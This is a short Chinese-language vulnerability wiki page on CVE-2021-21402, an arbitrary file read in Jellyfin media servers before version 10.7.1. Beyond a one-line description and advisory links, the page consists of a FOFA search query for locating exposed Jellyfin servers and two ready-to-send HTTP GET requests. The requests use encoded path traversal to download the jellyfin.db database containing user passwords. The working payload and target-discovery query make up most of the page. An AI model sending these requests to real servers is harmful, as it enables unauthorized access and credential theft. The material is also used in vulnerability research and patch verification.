menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Jellyfin 任意文件读取(CVE-2021-21402).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Jellyfin 任意文件读取(CVE-2021-21402).md
    740 B / 2021-05-21 09:14:38
        # Jellyfin 任意文件读取(CVE-2021-21402)

Jellyfin是一个免费软件媒体系统。在10.7.1版之前的Jellyfin中,带有某些终结点的精心设计的请求将允许从Jellyfin服务器的文件系统中读取任意文件。

fofa:

```
title="Jellyfin"
```

任意文件读取:

```
//以下请求jellyfin.db将从服务器下载带有密码的数据库
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
```

![-w1093](media/16215838843080/16215839880736.jpg)


ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-21402
* https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
* https://forum.ywhack.com/thread-115353-1-7.html
    links
    file_download